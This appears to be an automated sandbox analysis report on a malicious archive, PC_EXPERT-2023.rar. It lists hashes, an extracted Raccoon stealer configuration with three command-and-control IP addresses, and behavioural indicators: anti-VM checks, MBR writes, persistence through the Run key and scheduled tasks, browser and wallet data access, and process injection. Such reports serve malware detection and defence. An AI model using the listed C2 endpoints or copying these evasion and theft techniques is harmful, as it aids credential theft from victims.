Resubmissions
30-01-2023 23:22 | 230130-3cv9radb76 | 10
30-01-2023 23:21 | 230130-3b3x7sdb74 | 3
30-01-2023 23:17 | 230130-29z4jadb72 | 10

Analysis
max time kernel: 669s
max time network: 690s
platform: windows10-1703_x64
resource: win10-20220812-en
resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
submitted: 30-01-2023 23:22

Static task: static1
Behavioral task: behavioral1
Sample: PC_EXPERT-2023.rar
Resource: win10-20220812-en
General
Target: PC_EXPERT-2023.rar
Size: 45.9MB
MD5: f093310a1184ce70410f1b5804a80e71
SHA1: 6e65c4750890b85dde47dff3c30be157f695a540
SHA256: da7cf88afd6042e42b4f1fd2b8a4406a2760a0799ba6518e4e1b2d9d8ccd85ea
SHA512: bd36a977f01b07753c4a8af8731df839b291bfe792a0650edf626da57592d2afbc00e5b456758afe7f50e694bd10a5643e2344c9fdc829ca4b58179c8344cb2b
SSDEEP: 786432:2esLswaZZTWu1X0NyoWQiNOlorjNNQufwgtUapmGrX64PM6VPB:p2sDBWucyOarjp44pm74EA
Malware Config
Extracted: C:\Program Files\WinRAR\Rar.txt
Extracted: C:\Program Files\WinRAR\WhatsNew.txt
URLs:
http://weirdsgn.com
http://icondesignlab.com
https://rarlab.com/themes/WinRAR_Classic_48x36.theme.rar
Extracted: raccoon
8c3e4aa007fb2f2defacc1f952806f72
http://85.192.40.253/
http://170.75.160.9/
http://79.137.195.240/
Signatures
Modifies system executable filetype association (2 TTPs, 8 IoCs)
Processes: uninstall.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | uninstall.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | uninstall.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | uninstall.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | uninstall.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | uninstall.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 2 IoCs)
Processes: Wondershare Filmora.exe, 4w6x1TqK.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | Wondershare Filmora.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 4w6x1TqK.exe
Downloads MZ/PE file
Drops file in Drivers directory (1 IoCs)
Processes: AppLaunch.exe
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | AppLaunch.exe
Executes dropped EXE (34 IoCs)
pid | process
3044 | winrar-x64-620.exe
4456 | uninstall.exe
3736 | WinRAR.exe
2536 | File-Set-Up_PC.exe
3844 | File-Set-Up_PC.exe
1528 | 4w6x1TqK.exe
2020 | 8ZmsaNu9.exe
4728 | ouicztmm.exe
3680 | dllhost.exe
4684 | filmora_setup_full846.exe
4868 | svcupdater.exe
5228 | NFWCHK.exe
4816 | filmora_64bit_full846.exe
5912 | filmora_64bit_full846.tmp
4544 | _setup64.tmp
4236 | winlogson.exe
3264 | DFpAnk0w.exe
580 | Wondershare Helper Compact.exe
3844 | Wondershare Helper Compact.tmp
4560 | WSHelper.exe
4156 | vcredist_x64.exe
5528 | install.exe
3620 | Wondershare NativePush.exe
1928 | Wondershare NativePush.tmp
4068 | _setup64.tmp
2536 | WsNativePushService.exe
3640 | WsNativePushService.exe
5668 | WsNativePushService.exe
3264 | WsToastNotification.exe
1936 | dllhost.exe
4376 | winlogson.exe
5060 | Wondershare Filmora Launcher.exe
5432 | Wondershare Filmora.exe
1560 | AlgorithmRunTest.exe
Modifies Windows Firewall (1 TTPs, 1 IoCs)
Registers COM server for autorun (1 TTPs, 5 IoCs)
Processes: uninstall.exe, WsToastNotification.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment" | uninstall.exe
Key created | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\CLSID\{14100442-9664-1407-2647-000000000000}\LocalServer32 | WsToastNotification.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\CLSID\{14100442-9664-1407-2647-000000000000}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Wondershare\\Wondershare NativePush\\WsToastNotification.exe\" -ToastActivated" | WsToastNotification.exe
Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes: Wondershare Filmora.exe, 4w6x1TqK.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Wondershare Filmora.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 4w6x1TqK.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 4w6x1TqK.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Wondershare Filmora.exe
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: 8ZmsaNu9.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Control Panel\International\Geo\Nation | 8ZmsaNu9.exe
Loads dropped DLL (64 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: Wondershare Helper Compact.tmp
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | Wondershare Helper Compact.tmp
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Wondershare Helper Compact.exe = "C:\\Program Files (x86)\\Common Files\\Wondershare\\Wondershare Helper Compact\\WSHelper.exe" | Wondershare Helper Compact.tmp
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes: 4w6x1TqK.exe, Wondershare Filmora.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 4w6x1TqK.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Wondershare Filmora.exe
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes: Wondershare Filmora.exe
description | ioc | process
File opened for modification | \??\PhysicalDrive0 | Wondershare Filmora.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (13 IoCs)
pid | process
2536 | File-Set-Up_PC.exe
2536 | File-Set-Up_PC.exe
3844 | File-Set-Up_PC.exe
3844 | File-Set-Up_PC.exe
4728 | ouicztmm.exe
4728 | ouicztmm.exe
4868 | svcupdater.exe
4868 | svcupdater.exe
3264 | DFpAnk0w.exe
3264 | DFpAnk0w.exe
5432 | Wondershare Filmora.exe
5432 | Wondershare Filmora.exe
5432 | Wondershare Filmora.exe
Suspicious use of SetThreadContext (1 IoCs)
Processes: 4w6x1TqK.exe
description | pid | process | target process
PID 1528 set thread context of 764 | 1528 | 4w6x1TqK.exe | AppLaunch.exe
Drops file in Program Files directory (64 IoCs)
Drops file in Windows directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes: taskmgr.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: Wondershare Filmora.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Wondershare Filmora.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | Wondershare Filmora.exe
Creates scheduled task(s) (1 TTPs, 10 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
1180 | schtasks.exe
3204 | schtasks.exe
1900 | schtasks.exe
4232 | schtasks.exe
1284 | schtasks.exe
496 | schtasks.exe
4468 | schtasks.exe
1016 | schtasks.exe
3028 | schtasks.exe
3656 | schtasks.exe
Enumerates system info in registry (2 TTPs, 9 IoCs)
Processes: chrome.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Kills process with taskkill (39 IoCs)
Modifies Control Panel (1 IoCs)
Processes: filmora_setup_full846.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Control Panel\Desktop\MuiCached | filmora_setup_full846.exe
Processes: filmora_setup_full846.exe, WinRAR.exe, MicrosoftEdge.exe, browser_broker.exe, MicrosoftEdgeCP.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | filmora_setup_full846.exe
Key created | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | WinRAR.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | WinRAR.exe
Key created | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | filmora_setup_full846.exe
Modifies data under HKEY_USERS (3 IoCs)
Processes: msiexec.exe
description | ioc | process
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E | msiexec.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f | msiexec.exe
Modifies registry class (64 IoCs)
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5CAFA8E-F69D-4E6F-9BF3-1F4522AFD4BE}\TypeLib WSHelper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r05\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r11\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E1839CDE-A191-4DA4-9FCE-178A88318DF4}\TypeLib\Version = "1.1" WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E1839CDE-A191-4DA4-9FCE-178A88318DF4}\ProxyStubClsid32 WSHelper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WFPFile\ = "Wondershare Filmora 12 Project" filmora_64bit_full846.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command uninstall.exe Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 03bc80556daed801 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It 
is a violation of Windows Policy to modify = 01000000ecf84c9afe63228ede2e4ca471aa00dc74a3bd987274a77f6bcd7759815e8d2e35d7281d25e97107403f34e7b1cc00a04c3e383552590cc341ec MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\www.bing.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR uninstall.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4D3609D2-1D8A-4E9F-884B-438AFDDECB86}\TypeLib\ = "{D85C6069-D628-4276-93C3-9A94E5338D8B}" WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{225BE4D8-64CA-49B1-9630-917F2D92F452}\ProxyStubClsid32 WSHelper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.zip uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" uninstall.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wfpbundles filmora_64bit_full846.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E90BA470-0728-47E6-B2E7-0ED0C0CFEA8F} WSHelper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5610D1A9-5B54-4E77-9190-94FF9E59AFBA}\TypeLib\ = "{D85C6069-D628-4276-93C3-9A94E5338D8B}" WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz uninstall.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WFPFile\Shell\Open\ = "&Open" filmora_64bit_full846.tmp -
NTFS ADS 1 IoCs
Processes: browser_broker.exe
- File opened for modification C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\filmora_setup_full846.exe.r1gknyx.partial:Zone.Identifier browser_broker.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: Wondershare Filmora.exe
- pid process: 5432 Wondershare Filmora.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: chrome.exe, File-Set-Up_PC.exe, ouicztmm.exe, AppLaunch.exe, powershell.exe
- pid process: 4300 chrome.exe, 4300 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 3956 chrome.exe, 3956 chrome.exe, 1192 chrome.exe, 1192 chrome.exe, 2500 chrome.exe, 2500 chrome.exe, 2736 chrome.exe, 3060 chrome.exe, 2736 chrome.exe, 3060 chrome.exe, 4744 chrome.exe, 4744 chrome.exe, 4440 chrome.exe, 4440 chrome.exe, 1296 chrome.exe, 1296 chrome.exe, 4636 chrome.exe, 4636 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 4552 chrome.exe, 4552 chrome.exe, 3304 chrome.exe, 3304 chrome.exe, 68 chrome.exe, 68 chrome.exe, 2352 chrome.exe, 2352 chrome.exe, 1476 chrome.exe, 1476 chrome.exe, 1636 chrome.exe, 1636 chrome.exe, 2820 chrome.exe, 2820 chrome.exe, 4684 chrome.exe, 4684 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 5016 chrome.exe, 5016 chrome.exe, 4348 chrome.exe, 4348 chrome.exe, 4348 chrome.exe, 4348 chrome.exe, 752 chrome.exe, 752 chrome.exe, 2528 chrome.exe, 2528 chrome.exe, 2536 File-Set-Up_PC.exe, 2536 File-Set-Up_PC.exe, 3844 File-Set-Up_PC.exe, 3844 File-Set-Up_PC.exe, 4728 ouicztmm.exe, 4728 ouicztmm.exe, 4728 ouicztmm.exe, 4728 ouicztmm.exe, 764 AppLaunch.exe, 2732 powershell.exe, 2732 powershell.exe, 2732 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes: OpenWith.exe, WinRAR.exe, taskmgr.exe
- pid process: 3988 OpenWith.exe, 3736 WinRAR.exe, 5720 taskmgr.exe
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
- pid process: 632
Suspicious behavior: MapViewOfSection 4 IoCs
Processes: MicrosoftEdgeCP.exe
- pid process: 400 MicrosoftEdgeCP.exe, 400 MicrosoftEdgeCP.exe, 400 MicrosoftEdgeCP.exe, 5132 MicrosoftEdgeCP.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs
Processes: chrome.exe
- pid process: 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 1168 chrome.exe, 1168 chrome.exe, 1168 chrome.exe, 1168 chrome.exe, 1168 chrome.exe, 1168 chrome.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: AUDIODG.EXE, AppLaunch.exe, powershell.exe, MicrosoftEdge.exe, dllhost.exe, MicrosoftEdgeCP.exe, powercfg.exe, filmora_setup_full846.exe, taskmgr.exe, TASKKILL.exe
- Token: 33 3468 AUDIODG.EXE
- Token: SeIncBasePriorityPrivilege 3468 AUDIODG.EXE
- Token: SeDebugPrivilege 764 AppLaunch.exe
- Token: SeDebugPrivilege 2732 powershell.exe
- Token: SeDebugPrivilege 3064 MicrosoftEdge.exe
- Token: SeDebugPrivilege 3064 MicrosoftEdge.exe
- Token: SeDebugPrivilege 3064 MicrosoftEdge.exe
- Token: SeDebugPrivilege 3064 MicrosoftEdge.exe
- Token: SeDebugPrivilege 3680 dllhost.exe
- Token: SeShutdownPrivilege 1988 MicrosoftEdgeCP.exe
- Token: SeCreatePagefilePrivilege 1988 MicrosoftEdgeCP.exe
- Token: SeShutdownPrivilege 2220 powercfg.exe
- Token: SeCreatePagefilePrivilege 2220 powercfg.exe
- Token: SeDebugPrivilege 708 powershell.exe
- Token: SeDebugPrivilege 4900 powershell.exe
- Token: SeDebugPrivilege 216 powershell.exe
- Token: SeDebugPrivilege 2532 powershell.exe
- Token: SeDebugPrivilege 2464 powershell.exe
- Token: SeShutdownPrivilege 4972 powercfg.exe
- Token: SeCreatePagefilePrivilege 4972 powercfg.exe
- Token: SeDebugPrivilege 2980 MicrosoftEdgeCP.exe
- Token: SeDebugPrivilege 2980 MicrosoftEdgeCP.exe
- Token: SeShutdownPrivilege 2116 powercfg.exe
- Token: SeCreatePagefilePrivilege 2116 powercfg.exe
- Token: SeDebugPrivilege 1988 MicrosoftEdgeCP.exe
- Token: SeDebugPrivilege 1988 MicrosoftEdgeCP.exe
- Token: SeDebugPrivilege 1988 MicrosoftEdgeCP.exe
- Token: SeShutdownPrivilege 4644 powercfg.exe
- Token: SeCreatePagefilePrivilege 4644 powercfg.exe
- Token: SeShutdownPrivilege 4644 powercfg.exe
- Token: SeCreatePagefilePrivilege 4644 powercfg.exe
- Token: SeDebugPrivilege 5356 MicrosoftEdgeCP.exe
- Token: SeDebugPrivilege 5356 MicrosoftEdgeCP.exe
- Token: SeDebugPrivilege 5356 MicrosoftEdgeCP.exe
- Token: SeDebugPrivilege 5356 MicrosoftEdgeCP.exe
- Token: SeDebugPrivilege 3064 MicrosoftEdge.exe
- Token: SeDebugPrivilege 4684 filmora_setup_full846.exe
- Token: SeDebugPrivilege 4684 filmora_setup_full846.exe
- Token: SeDebugPrivilege 4684 filmora_setup_full846.exe
- Token: SeDebugPrivilege 4684 filmora_setup_full846.exe
- Token: SeDebugPrivilege 4684 filmora_setup_full846.exe
- Token: SeDebugPrivilege 4684 filmora_setup_full846.exe
- Token: SeDebugPrivilege 4684 filmora_setup_full846.exe
- Token: SeDebugPrivilege 5720 taskmgr.exe
- Token: SeSystemProfilePrivilege 5720 taskmgr.exe
- Token: SeCreateGlobalPrivilege 5720 taskmgr.exe
- Token: SeDebugPrivilege 5568 TASKKILL.exe
- Token: SeDebugPrivilege 5516 TASKKILL.exe
- Token: SeDebugPrivilege 1808 TASKKILL.exe
- Token: SeDebugPrivilege 5136 TASKKILL.exe
- Token: SeDebugPrivilege 3924 TASKKILL.exe
- Token: SeDebugPrivilege 4476 TASKKILL.exe
- Token: SeDebugPrivilege 4664 TASKKILL.exe
- Token: SeDebugPrivilege 4648 TASKKILL.exe
- Token: SeDebugPrivilege 4224 TASKKILL.exe
- Token: SeDebugPrivilege 4748 TASKKILL.exe
- Token: SeDebugPrivilege 4916 TASKKILL.exe
- Token: SeDebugPrivilege 5356 TASKKILL.exe
- Token: SeDebugPrivilege 5328 TASKKILL.exe
- Token: SeDebugPrivilege 4420 TASKKILL.exe
- Token: SeDebugPrivilege 900 TASKKILL.exe
- Token: SeDebugPrivilege 5664 TASKKILL.exe
- Token: SeDebugPrivilege 5900 TASKKILL.exe
- Token: SeDebugPrivilege 5568 TASKKILL.exe
Suspicious use of FindShellTrayWindow 64 IoCs
Processes: chrome.exe
- pid process: 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 4248 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe, 2200 chrome.exe
Suspicious use of SendNotifyMessage 64 IoCs
Processes: chrome.exe
